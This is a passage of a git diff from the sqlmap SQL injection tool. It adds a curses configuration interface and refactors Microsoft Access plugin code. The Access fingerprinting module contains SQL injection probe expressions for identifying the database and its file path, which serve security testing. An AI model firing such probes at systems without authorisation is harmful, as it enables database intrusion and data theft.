self.stdscr.attron(curses.color_pair(7)) + + self.stdscr.addstr(y, 2, label) + + if is_selected: + self.stdscr.attroff(curses.color_pair(4) | curses.A_BOLD) + else: + self.stdscr.attroff(curses.color_pair(7)) + except: + pass + + # Draw value + value_str = "" + if option['type'] == 'bool': + value = option['value'] if option['value'] is not None else option.get('default') + value_str = "[X]" if value else "[ ]" + else: + value_str = str(option['value']) if option['value'] else "" + if option['default'] and not option['value']: + value_str = "(%s)" % str(option['default']) + + value_str = value_str[:30] + + try: + if is_selected: + self.stdscr.attron(curses.color_pair(4) | curses.A_BOLD) + self.stdscr.addstr(y, 28, value_str) + if is_selected: + self.stdscr.attroff(curses.color_pair(4) | curses.A_BOLD) + except: + pass + + # Draw help text + if width > 65: + help_text = option['help'][:width-62] if option['help'] else "" + try: + self.stdscr.attron(curses.color_pair(5)) + self.stdscr.addstr(y, 60, help_text) + 
self.stdscr.attroff(curses.color_pair(5)) + except: + pass + + y += 1 + + # Draw scroll indicator + if len(tab['options']) > visible_end - visible_start: + try: + self.stdscr.attron(curses.color_pair(6)) + self.stdscr.addstr(height - 2, width - 10, "[More...]") + self.stdscr.attroff(curses.color_pair(6)) + except: + pass + + def _wrap_text(self, text, width): + """Wrap text to fit within width""" + words = text.split() + lines = [] + current_line = "" + + for word in words: + if len(current_line) + len(word) + 1 <= width: + current_line += word + " " + else: + if current_line: + lines.append(current_line.strip()) + current_line = word + " " + + if current_line: + lines.append(current_line.strip()) + + return lines + + def _edit_field(self): + """Edit the current field""" + tab = self.tabs[self.current_tab] + if self.current_field >= len(tab['options']): + return + + option = tab['options'][self.current_field] + + if option['type'] == 'bool': + # Toggle boolean + option['value'] = not option['value'] + else: + # Text input + height, width = self.stdscr.getmaxyx() + + # Create input window + input_win = curses.newwin(5, width - 20, height // 2 - 2, 10) + input_win.box() + input_win.attron(curses.color_pair(2)) + input_win.addstr(0, 2, " Edit %s " % option['label'][:20]) + input_win.attroff(curses.color_pair(2)) + input_win.addstr(2, 2, "Value:") + input_win.refresh() + + # Get input + curses.echo() + curses.curs_set(1) + + # Pre-fill with existing value + current_value = str(option['value']) if option['value'] else "" + input_win.addstr(2, 9, current_value) + input_win.move(2, 9) + + try: + new_value = input_win.getstr(2, 9, width - 32).decode('utf-8') + + # Validate and convert based on type + if option['type'] == 'int': + try: + option['value'] = int(new_value) if new_value else None + except ValueError: + option['value'] = None + elif option['type'] == 'float': + try: + option['value'] = float(new_value) if new_value else None + except ValueError: + option['value'] = None + else: + option['value'] = new_value if new_value else None + except: + pass + + curses.noecho() + curses.curs_set(0) + + # Clear input window + input_win.clear() + input_win.refresh() + del input_win + + def _export_config(self): + """Export current configuration to a file""" + height, width = self.stdscr.getmaxyx() + + # Create input window + input_win = curses.newwin(5, width - 20, height // 2 - 2, 10) + input_win.box() + input_win.attron(curses.color_pair(2)) + input_win.addstr(0, 2, " Export Configuration ") + input_win.attroff(curses.color_pair(2)) + input_win.addstr(2, 2, "File:") + input_win.refresh() + + # Get input + curses.echo() + curses.curs_set(1) + + try: + filename = input_win.getstr(2, 8, width - 32).decode('utf-8').strip() + + if filename: + # Collect all field values + config = {} + for tab in self.tabs: + for option in tab['options']: + dest = option['dest'] + value = option['value'] if option['value'] is not None else option.get('default') + + if option['type'] == 'bool': + config[dest] = bool(value) + elif option['type'] == 'int': + config[dest] = int(value) if value else None + elif option['type'] == 'float': + config[dest] = float(value) if value else None + else: + config[dest] = value + + # Set defaults for unset options + for option in self.parser.option_list: + if option.dest not in config or config[option.dest] is None: + config[option.dest] = defaults.get(option.dest, None) + + # Save config + try: + saveConfig(config, filename) + + # Show success message + input_win.clear() + 
input_win.box() + input_win.attron(curses.color_pair(5)) + input_win.addstr(0, 2, " Export Successful ") + input_win.attroff(curses.color_pair(5)) + input_win.addstr(2, 2, "Configuration exported to:") + input_win.addstr(3, 2, filename[:width - 26]) + input_win.refresh() + curses.napms(2000) + except Exception as ex: + # Show error message + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(6)) + input_win.addstr(0, 2, " Export Failed ") + input_win.attroff(curses.color_pair(6)) + input_win.addstr(2, 2, str(getSafeExString(ex))[:width - 26]) + input_win.refresh() + curses.napms(2000) + except: + pass + + curses.noecho() + curses.curs_set(0) + + # Clear input window + input_win.clear() + input_win.refresh() + del input_win + + def _import_config(self): + """Import configuration from a file""" + height, width = self.stdscr.getmaxyx() + + # Create input window + input_win = curses.newwin(5, width - 20, height // 2 - 2, 10) + input_win.box() + input_win.attron(curses.color_pair(2)) + input_win.addstr(0, 2, " Import Configuration ") + input_win.attroff(curses.color_pair(2)) + input_win.addstr(2, 2, "File:") + input_win.refresh() + + # Get input + curses.echo() + curses.curs_set(1) + + try: + filename = input_win.getstr(2, 8, width - 32).decode('utf-8').strip() + + if filename and os.path.isfile(filename): + try: + # Read config file + config = _configparser.ConfigParser() + config.read(filename) + + imported_count = 0 + + # Load values into fields + for tab in self.tabs: + for option in tab['options']: + dest = option['dest'] + + # Search for option in all sections + for section in config.sections(): + if config.has_option(section, dest): + value = config.get(section, dest) + + # Convert based on type + if option['type'] == 'bool': + option['value'] = value.lower() in ('true', '1', 'yes', 'on') + elif option['type'] == 'int': + try: + option['value'] = int(value) if value else None + except ValueError: + option['value'] = None + elif option['type'] == 'float': + try: + option['value'] = float(value) if value else None + except ValueError: + option['value'] = None + else: + option['value'] = value if value else None + + imported_count += 1 + break + + # Show success message + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(5)) + input_win.addstr(0, 2, " Import Successful ") + input_win.attroff(curses.color_pair(5)) + input_win.addstr(2, 2, "Imported %d options from:" % imported_count) + input_win.addstr(3, 2, filename[:width - 26]) + input_win.refresh() + curses.napms(2000) + + except Exception as ex: + # Show error message + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(6)) + input_win.addstr(0, 2, " Import Failed ") + input_win.attroff(curses.color_pair(6)) + input_win.addstr(2, 2, str(getSafeExString(ex))[:width - 26]) + input_win.refresh() + curses.napms(2000) + elif filename: + # File not found + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(6)) + input_win.addstr(0, 2, " File Not Found ") + input_win.attroff(curses.color_pair(6)) + input_win.addstr(2, 2, "File does not exist:") + input_win.addstr(3, 2, filename[:width - 26]) + input_win.refresh() + curses.napms(2000) + except: + pass + + curses.noecho() + curses.curs_set(0) + + # Clear input window + input_win.clear() + input_win.refresh() + del input_win + + def _run_sqlmap(self): + """Run sqlmap with current configuration""" + config = {} + + # Collect all field values + for tab in self.tabs: + for option in tab['options']: + dest = 
option['dest'] + value = option['value'] if option['value'] is not None else option.get('default') + + if option['type'] == 'bool': + config[dest] = bool(value) + elif option['type'] == 'int': + config[dest] = int(value) if value else None + elif option['type'] == 'float': + config[dest] = float(value) if value else None + else: + config[dest] = value + + # Set defaults for unset options + for option in self.parser.option_list: + if option.dest not in config or config[option.dest] is None: + config[option.dest] = defaults.get(option.dest, None) + + # Create temp config file + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + + saveConfig(config, configFile) + + # Show console + self._show_console(configFile) + + def _show_console(self, configFile): + """Show console output from sqlmap""" + height, width = self.stdscr.getmaxyx() + + # Create console window + console_win = curses.newwin(height - 4, width - 4, 2, 2) + console_win.box() + console_win.attron(curses.color_pair(2)) + console_win.addstr(0, 2, " sqlmap Console - Press Q to close ") + console_win.attroff(curses.color_pair(2)) + console_win.refresh() + + # Create output area + output_win = console_win.derwin(height - 8, width - 8, 2, 2) + output_win.scrollok(True) + output_win.idlok(True) + + # Start sqlmap process + try: + process = subprocess.Popen( + [sys.executable or "python", os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap.py"), "-c", configFile], + shell=False, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + stdin=subprocess.PIPE, + bufsize=1, + close_fds=not IS_WIN + ) + + if not IS_WIN: + # Make it non-blocking + import fcntl + flags = fcntl.fcntl(process.stdout, fcntl.F_GETFL) + fcntl.fcntl(process.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK) + + output_win.nodelay(True) + console_win.nodelay(True) + + lines = [] + current_line = "" + + while True: + # Check for user input + try: + key = console_win.getch() + if key in (ord('q'), ord('Q')): + # Kill process + process.terminate() + break + elif key == curses.KEY_ENTER or key == 10: + # Send newline to process + if process.poll() is None: + try: + process.stdin.write(b'\n') + process.stdin.flush() + except: + pass + except: + pass + + # Read output + try: + chunk = process.stdout.read(1024) + if chunk: + current_line += chunk.decode('utf-8', errors='ignore') + + # Split into lines + while '\n' in current_line: + line, current_line = current_line.split('\n', 1) + lines.append(line) + + # Keep only last N lines + if len(lines) > 1000: + lines = lines[-1000:] + + # Display lines + output_win.clear() + start_line = max(0, len(lines) - (height - 10)) + for i, l in enumerate(lines[start_line:]): + try: + output_win.addstr(i, 0, l[:width-10]) + except: + pass + output_win.refresh() + console_win.refresh() + except: + pass + + # Check if process ended + if process.poll() is not None: + # Read remaining output + try: + remaining = process.stdout.read() + if remaining: + current_line += remaining.decode('utf-8', errors='ignore') + for line in current_line.split('\n'): + if line: + lines.append(line) + except: + pass + + # Display final output + output_win.clear() + start_line = max(0, len(lines) - (height - 10)) + for i, l in enumerate(lines[start_line:]): + try: + output_win.addstr(i, 0, l[:width-10]) + except: + pass + + output_win.addstr(height - 9, 0, "--- Process finished. 
Press Q to close ---") + output_win.refresh() + console_win.refresh() + + # Wait for Q + console_win.nodelay(False) + while True: + key = console_win.getch() + if key in (ord('q'), ord('Q')): + break + + break + + # Small delay + curses.napms(50) + + except Exception as ex: + output_win.addstr(0, 0, "Error: %s" % getSafeExString(ex)) + output_win.refresh() + console_win.nodelay(False) + console_win.getch() + + finally: + # Clean up + try: + os.unlink(configFile) + except: + pass + + console_win.nodelay(False) + output_win.nodelay(False) + del output_win + del console_win + + def run(self): + """Main UI loop""" + while True: + self.stdscr.clear() + + # Draw UI + self._draw_header() + self._draw_tabs() + self._draw_current_tab() + self._draw_footer() + + self.stdscr.refresh() + + # Get input + key = self.stdscr.getch() + + tab = self.tabs[self.current_tab] + + # Handle input + if key == curses.KEY_F10 or key == 27: # F10 or ESC + break + elif key == ord('\t') or key == curses.KEY_RIGHT: # Tab or Right arrow + self.current_tab = (self.current_tab + 1) % len(self.tabs) + self.current_field = 0 + self.scroll_offset = 0 + elif key == curses.KEY_LEFT: # Left arrow + self.current_tab = (self.current_tab - 1) % len(self.tabs) + self.current_field = 0 + self.scroll_offset = 0 + elif key == curses.KEY_UP: # Up arrow + if self.current_field > 0: + self.current_field -= 1 + # Adjust scroll if needed + if self.current_field < self.scroll_offset: + self.scroll_offset = self.current_field + elif key == curses.KEY_DOWN: # Down arrow + if self.current_field < len(tab['options']) - 1: + self.current_field += 1 + # Adjust scroll if needed + height, width = self.stdscr.getmaxyx() + visible_lines = height - 8 + if self.current_field >= self.scroll_offset + visible_lines: + self.scroll_offset = self.current_field - visible_lines + 1 + elif key == curses.KEY_ENTER or key == 10 or key == 13: # Enter + self._edit_field() + elif key == curses.KEY_F2: # F2 to run + self._run_sqlmap() + elif key == curses.KEY_F3: # F3 to export + self._export_config() + elif key == curses.KEY_F4: # F4 to import + self._import_config() + elif key == ord(' '): # Space for boolean toggle + option = tab['options'][self.current_field] + if option['type'] == 'bool': + option['value'] = not option['value'] + +def runTui(parser): + """Main entry point for ncurses TUI""" + # Check if ncurses is available + if curses is None: + raise SqlmapMissingDependence("missing 'curses' module (optional Python module). Use a Python build that includes curses/ncurses, or install the platform-provided equivalent (e.g. for Windows: pip install windows-curses)") + try: + # Initialize and run + def main(stdscr): + ui = NcursesUI(stdscr, parser) + ui.run() + + curses.wrapper(main) + + except Exception as ex: + errMsg = "unable to create ncurses UI ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py new file mode 100644 index 00000000000..d54a313aca3 --- /dev/null +++ b/lib/utils/versioncheck.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import sys +import time + +PYVERSION = sys.version.split()[0] + +if PYVERSION < "2.7": + sys.exit("[%s] [CRITICAL] incompatible Python version detected ('%s'). 
To successfully run sqlmap you'll have to use version 2.7 or 3.x (visit 'https://www.python.org/downloads/')" % (time.strftime("%X"), PYVERSION)) + +errors = [] +extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") +for _ in extensions: + try: + __import__(_) + except ImportError: + errors.append(_) + +if errors: + errMsg = "[%s] [CRITICAL] missing one or more core extensions (%s) " % (time.strftime("%X"), ", ".join("'%s'" % _ for _ in errors)) + errMsg += "most likely because current version of Python has been " + errMsg += "built without appropriate dev packages" + sys.exit(errMsg) diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index 80a2ab61e9a..1a911b567e3 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py @@ -1,14 +1,38 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import numbers + class xrange(object): """ Advanced (re)implementation of xrange (supports slice/copy/etc.) Reference: http://code.activestate.com/recipes/521885-a-pythonic-implementation-of-xrange/ + + >>> list(xrange(1, 9)) == list(range(1, 9)) + True + >>> list(xrange(8, 0, -16)) == list(range(8, 0, -16)) + True + >>> list(xrange(0, 8, 16)) == list(range(0, 8, 16)) + True + >>> list(xrange(0, 4, 5)) == list(range(0, 4, 5)) + True + >>> list(xrange(4, 0, 3)) == list(range(4, 0, 3)) + True + >>> list(xrange(0, -3)) == list(range(0, -3)) + True + >>> list(xrange(0, 7, 2)) == list(range(0, 7, 2)) + True + >>> foobar = xrange(1, 10) + >>> 7 in foobar + True + >>> 11 in foobar + False + >>> foobar[0] + 1 """ __slots__ = ['_slice'] @@ -20,7 +44,7 @@ def __init__(self, *args): self._slice = slice(*args) if self._slice.stop is None: raise TypeError("xrange stop must not be None") - + @property def start(self): if self._slice.start is not None: @@ -40,37 +64,41 @@ def step(self): def __hash__(self): return hash(self._slice) - def __cmp__(self, other): - return (cmp(type(self), type(other)) or - cmp(self._slice, other._slice)) - def __repr__(self): - return '%s(%r, %r, %r)' % (type(self).__name__, - self.start, self.stop, self.step) + return '%s(%r, %r, %r)' % (type(self).__name__, self.start, self.stop, self.step) def __len__(self): return self._len() def _len(self): - return max(0, int((self.stop - self.start) / self.step)) + return max(0, 1 + int((self.stop - 1 - self.start) // self.step)) + + def __contains__(self, value): + return (self.start <= value < self.stop) and (value - self.start) % self.step == 0 def __getitem__(self, index): if isinstance(index, slice): start, stop, step = index.indices(self._len()) return xrange(self._index(start), - self._index(stop), step*self.step) - elif isinstance(index, (int, long)): + self._index(stop), step * self.step) + elif isinstance(index, numbers.Integral): if index < 0: fixed_index = index + self._len() else: fixed_index = index - + if not 0 <= fixed_index < self._len(): raise IndexError("Index %d out of %r" % (index, self)) - + return self._index(fixed_index) else: raise TypeError("xrange indices must be slices or integers") def _index(self, i): return self.start + self.step * i + + def index(self, i): + if self.start <= i < self.stop: + return i - self.start + else: + raise ValueError("%d is not in list" % i) diff --git a/plugins/__init__.py b/plugins/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/plugins/__init__.py +++ 
b/plugins/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/plugins/dbms/__init__.py +++ b/plugins/dbms/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py index 4df52f81250..fbb3a131c46 100644 --- a/plugins/dbms/access/__init__.py +++ b/plugins/dbms/access/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class AccessMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = ACCESS_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.ACCESS] = Syntax.escape diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index 40160f0f242..91b8f246649 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import pyodbc -except ImportError: +except: pass import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -21,16 +22,12 @@ class Connector(GenericConnector): """ - Homepage: http://pyodbc.googlecode.com/ - User guide: http://code.google.com/p/pyodbc/wiki/GettingStarted - API: http://code.google.com/p/pyodbc/w/list + Homepage: https://github.com/mkleehammer/pyodbc + User guide: https://github.com/mkleehammer/pyodbc/wiki Debian package: python-pyodbc License: MIT """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): if not IS_WIN: errMsg = "currently, direct connection to Microsoft Access database(s) " @@ -42,26 +39,26 @@ def connect(self): try: self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db) - except (pyodbc.Error, pyodbc.OperationalError), msg: - raise SqlmapConnectionException(msg[1]) + except (pyodbc.Error, pyodbc.OperationalError) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except pyodbc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except pyodbc.ProgrammingError as ex: + 
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) return None def execute(self, query): try: self.cursor.execute(query) - except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pyodbc.Error, msg: - raise SqlmapConnectionException(msg[1]) + except (pyodbc.OperationalError, pyodbc.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except pyodbc.Error as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py index 51e9d20fd14..806049186a0 100644 --- a/plugins/dbms/access/enumeration.py +++ b/plugins/dbms/access/enumeration.py @@ -1,81 +1,84 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getBanner(self): - warnMsg = "on Microsoft Access it is not possible to get a banner" - logger.warn(warnMsg) + warnMsg = "on Microsoft Access it is not possible to get the banner" + logger.warning(warnMsg) return None def getCurrentUser(self): warnMsg = "on Microsoft Access it is not possible to enumerate the current user" - logger.warn(warnMsg) + logger.warning(warnMsg) def getCurrentDb(self): warnMsg = "on Microsoft Access it is not possible to get name of the current database" - logger.warn(warnMsg) + logger.warning(warnMsg) - def isDba(self): + def isDba(self, user=None): warnMsg = "on Microsoft Access it is not possible to test if current user is DBA" - logger.warn(warnMsg) + logger.warning(warnMsg) def getUsers(self): warnMsg = "on Microsoft Access it is not possible to enumerate the users" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getPasswordHashes(self): warnMsg = "on Microsoft Access it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on Microsoft Access it is not possible to enumerate the user privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} def getDbs(self): warnMsg = "on Microsoft Access it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchDb(self): warnMsg = "on Microsoft Access it is not possible to search databases" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchTable(self): warnMsg = "on Microsoft Access it is not possible to search tables" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchColumn(self): warnMsg = "on Microsoft Access it is not possible to search columns" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def search(self): warnMsg = "on Microsoft Access search option is not available" - logger.warn(warnMsg) + logger.warning(warnMsg) def getHostname(self): warnMsg = "on Microsoft Access it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def 
getStatements(self): + warnMsg = "on Microsoft Access it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py index cdc28647418..bb8c17d1ec8 100644 --- a/plugins/dbms/access/filesystem.py +++ b/plugins/dbms/access/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on Microsoft Access it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on Microsoft Access it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index bb07ea37b6f..e542e889ece 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -10,9 +10,8 @@ from lib.core.common import Backend from lib.core.common import Format from lib.core.common import getCurrentThreadData -from lib.core.common import randomInt from lib.core.common import randomStr -from lib.core.common import wasLastRequestDBMSError +from lib.core.common import wasLastResponseDBMSError from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -49,11 +48,12 @@ def _sysTablesCheck(self): # Microsoft Access table reference updated on 01/2010 sysTables = { - "97": ("MSysModules2", "MSysAccessObjects"), - "2000" : ("!MSysModules2", "MSysAccessObjects"), - "2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), - "2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"), - } + "97": ("MSysModules2", "MSysAccessObjects"), + "2000": ("!MSysModules2", "MSysAccessObjects"), + "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), + "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"), + } + # MSysAccessXML is not a reliable system table because it doesn't always exist # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") @@ -67,8 +67,7 @@ def _sysTablesCheck(self): negate = True table = table[1:] - randInt = randomInt() - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt)) + result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table) if result is None: result = False @@ -91,13 +90,12 @@ def _getDatabaseDir(self): infoMsg = "searching for database directory" logger.info(infoMsg) - randInt = randomInt() randStr = randomStr() - inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt)) + 
inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) - if wasLastRequestDBMSError(): + if wasLastResponseDBMSError(): threadData = getCurrentThreadData() - match = re.search("Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) + match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) if match: retVal = match.group(1).rstrip("%s.mdb" % randStr) @@ -131,13 +129,14 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" + if banVer: + if re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -149,7 +148,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES): setDbms(DBMS.ACCESS) return True @@ -163,11 +162,11 @@ def checkDbms(self): infoMsg = "confirming %s" % DBMS.ACCESS logger.info(infoMsg) - result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") + result = inject.checkBooleanExpression("IIF(ATN(2) IS NOT NULL,1,0) BETWEEN 2 AND 0") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) + logger.warning(warnMsg) return False setDbms(DBMS.ACCESS) @@ -186,7 +185,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py index 0e7184081a5..9935739d90c 100644 --- a/plugins/dbms/access/syntax.py +++ b/plugins/dbms/access/syntax.py @@ -1,19 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)&CHR(98)&CHR(99)&CHR(100)&CHR(101)&CHR(102)&CHR(103)&CHR(104) FROM foobar" + True + """ + def escaper(value): - return "&".join("CHR(%d)" % ord(_) for _ in value) + return "&".join("CHR(%d)" % _ for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py index 315abc77af6..cb6e1fa7971 100644 --- a/plugins/dbms/access/takeover.py +++ b/plugins/dbms/access/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover 
class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on Microsoft Access it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/altibase/__init__.py b/plugins/dbms/altibase/__init__.py new file mode 100644 index 00000000000..a8e50cf19db --- /dev/null +++ b/plugins/dbms/altibase/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import ALTIBASE_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.altibase.enumeration import Enumeration +from plugins.dbms.altibase.filesystem import Filesystem +from plugins.dbms.altibase.fingerprint import Fingerprint +from plugins.dbms.altibase.syntax import Syntax +from plugins.dbms.altibase.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class AltibaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, 